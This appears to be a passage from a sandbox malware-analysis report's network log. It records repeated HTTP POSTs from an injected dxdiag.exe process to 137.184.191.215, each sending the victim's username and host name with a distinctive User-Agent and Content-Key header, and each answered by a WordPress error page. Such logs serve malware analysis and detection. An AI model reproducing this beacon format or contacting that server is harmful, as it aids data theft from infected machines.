                              Oct 1, 2024 07:50:25.189616919 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.565316137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:25.344274044 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:25.349104881 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:28.108458042 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:25 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:28.108474016 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:28.108480930 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.565317137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:28.269679070 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:28.274533987 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:30.981019974 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:28 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:30.981041908 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:30.981054068 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.565318137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:31.123728991 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:31.128557920 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:33.775808096 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:31 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:33.776006937 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:33.776020050 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.565319137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:33.924806118 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:33.929630041 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:36.691164970 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:34 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:36.691329956 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:36.691343069 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.565320137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:36.845133066 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:36.850013018 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:39.490346909 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:37 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:39.490542889 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:39.490556002 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.565321137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:39.641303062 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:39.646323919 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:42.285722017 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:40 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
